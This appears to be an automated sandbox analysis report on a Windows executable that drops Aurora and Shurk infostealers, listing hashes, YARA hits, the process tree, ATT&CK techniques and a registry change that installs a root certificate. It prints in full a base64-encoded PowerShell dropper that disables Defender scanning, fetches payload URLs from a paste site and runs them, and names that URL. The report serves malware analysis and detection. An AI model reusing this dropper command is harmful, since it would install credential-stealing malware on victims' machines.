aurora | f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
04-03-2024 18:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe
Size

25.5MB
MD5

ad9eddce12966e365ddb9b7fdae91340
SHA1

7f7bc6ceb99c67e01423c6f171df03f92771224e
SHA256

f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6
SHA512

82932ed99e4a87730b3fda8d4bff0cae261dede6a36a25eae670b10f7d2b6903c2576b4cf8f9d263d9ec8ff22a05b967e039e0d299195bb6aad7f0445bdf2522
SSDEEP

98304:blQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxW:xQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRD

Score

10^/10

aurora shurk infostealer stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/sb54d2/raw

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
infostealer shurk

Shurk Stealer payload 7 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe	shurk_stealer
\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe	shurk_stealer
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe	shurk_stealer
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe	shurk_stealer
behavioral1/memory/2368-13-0x0000000000400000-0x0000000001D8A000-memory.dmp	shurk_stealer
\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe	shurk_stealer
behavioral1/memory/2392-30-0x000000013F250000-0x0000000140B5B000-memory.dmp	shurk_stealer

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2720 powershell.exe
6 2720 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Aurora 22.12.2022_.exeblack.exe

pid process

2392 Aurora 22.12.2022_.exe
2208 black.exe

flow	pid	process
5	2720	powershell.exe
6	2720	powershell.exe

pid	process
2392	Aurora 22.12.2022_.exe
2208	black.exe

Loads dropped DLL 4 IoCs

Processes:

f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe

pid	process
2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe
2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe
2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe
2300

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Aurora 22.12.2022_.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Aurora 22.12.2022_.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Aurora 22.12.2022_.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2720 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2720 powershell.exe

pid	process
2720	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2720	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exeblack.exe

description	pid	process	target process
PID 2368 wrote to memory of 2392	2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	Aurora 22.12.2022_.exe
PID 2368 wrote to memory of 2392	2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	Aurora 22.12.2022_.exe
PID 2368 wrote to memory of 2392	2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	Aurora 22.12.2022_.exe
PID 2368 wrote to memory of 2392	2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	Aurora 22.12.2022_.exe
PID 2368 wrote to memory of 2208	2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	black.exe
PID 2368 wrote to memory of 2208	2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	black.exe
PID 2368 wrote to memory of 2208	2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	black.exe
PID 2368 wrote to memory of 2208	2368	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	black.exe
PID 2208 wrote to memory of 2720	2208	black.exe	powershell.exe
PID 2208 wrote to memory of 2720	2208	black.exe	powershell.exe
PID 2208 wrote to memory of 2720	2208	black.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe
"C:\Users\Admin\AppData\Local\Temp\f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2368

C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2392

C:\Users\Admin\AppData\Local\Temp\black.exe
"C:\Users\Admin\AppData\Local\Temp\black.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
Filesize
4.6MB

MD5
9a64e0b9cdeffc26d637391f13058420

SHA1
8f811eb9c1e305540bf3060de9886d4be528455b

SHA256
8fd7dd0de2261f9615e0ced6e5b46018c64571f2104322ebd07cc88e3b4f7461

SHA512
816bd3627ab6580d7ba8ed4853a50fe0ce2dc85abad22a58031d2f63a582023ca51f320dbe8f6ea76d66e5601110ad7e141349312f21ed0e4a5375b187f2668c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
Filesize
4.8MB

MD5
bb340b9b02f9433b8f697e6c95de72a3

SHA1
54fbb8106fff4def4c47fcefccb2834036f97cad

SHA256
eb7086927fa23ca70e779c103aae769bcc137b4642ae3d5696d042c54216b357

SHA512
333a556baa03469cd51b5562a41c3ec4a92d4b2ae690dcc66ae4e30e720817903c02d3a86b7e8f00631c64d1d2b26164e72eb048a9e9073975fc898942470769

Download Submit
C:\Users\Admin\AppData\Local\Temp\black.exe
Filesize
74KB

MD5
b755c4a6af6e4616b7174e9184d4bd01

SHA1
e856e899dcd618263c28ed7f635b2a95746564a2

SHA256
7bfc325de2e448380fe3ae921dddd5b4ab94432d60487d662d7b10ef2b248969

SHA512
def7a5405fda0692f8bf7dbc7cfb67e2e38c6a3391b52209cf73b43b2773216e7bc399e8449d752db6fa6910387f22d7a2cd2a543f30983d13603f75a52345f0

Download Submit
\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
Filesize
4.9MB

MD5
4b0438cbadca1feb51df5ebfdcb7cfb9

SHA1
59c65b08e01f301aff5a32bf0b3241cd8b87ec35

SHA256
d0a29d755a32649ac5189d7228ea167f044eef9c2f69be01da0560255cfb29d4

SHA512
180698d4863d599cdf4e435e2f6f96c6fbbcdda1c8ebfcba22c8dff7cb03f2f02576048ed2e039e410c9a4c2476e4ad922055f9fa62a56d279a586e5cbbe83f5

Download Submit
\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
Filesize
5.2MB

MD5
e81f39643bac69abe47e225738e755cb

SHA1
743bba9efa71671e0742601b04a4392d6d561cf2

SHA256
8a6c30ad2524fee73e67c524655d35be1a5e29a1959dca96b0109ad1adf20b23

SHA512
d59b6dc4b509e3a2048b7aaa8d54b48c8bab7b2c9a7b21ca30ea5d04e3b3cc07ceaae73ccd4a183ef5e66ac99f0b9e9c640f1f1ad353d7c1841ccbf11f875dd8

Download Submit
\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
Filesize
4.5MB

MD5
6d63551a1a9a8703df89466edaabfbcf

SHA1
24a6a9f19a618f4c1152a27e2bd31de490ec0b07

SHA256
a7a25d18db5178e32c9068965c1331a9c61b418c4e99e979fc590ffa2fef6e12

SHA512
7b1670b4a1bc7655d9d4bf4afd36e9942b78013a023a30148c7ee932df6492eadda9138e875aa0c96e2322c3654a0267f50719fb3373045d1f548992341a4d4a

Download Submit
memory/2208-15-0x0000000000110000-0x0000000000128000-memory.dmp

Filesize
96KB

Download
memory/2208-17-0x000007FEF5BD0000-0x000007FEF65BC000-memory.dmp

Filesize
9.9MB

Download
memory/2208-33-0x000007FEF5BD0000-0x000007FEF65BC000-memory.dmp

Filesize
9.9MB

Download
memory/2368-13-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download
memory/2392-30-0x000000013F250000-0x0000000140B5B000-memory.dmp

Filesize
25.0MB

Download
memory/2720-23-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2720-25-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2720-26-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2720-27-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2720-29-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2720-28-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2720-24-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2720-31-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2720-32-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2720-22-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download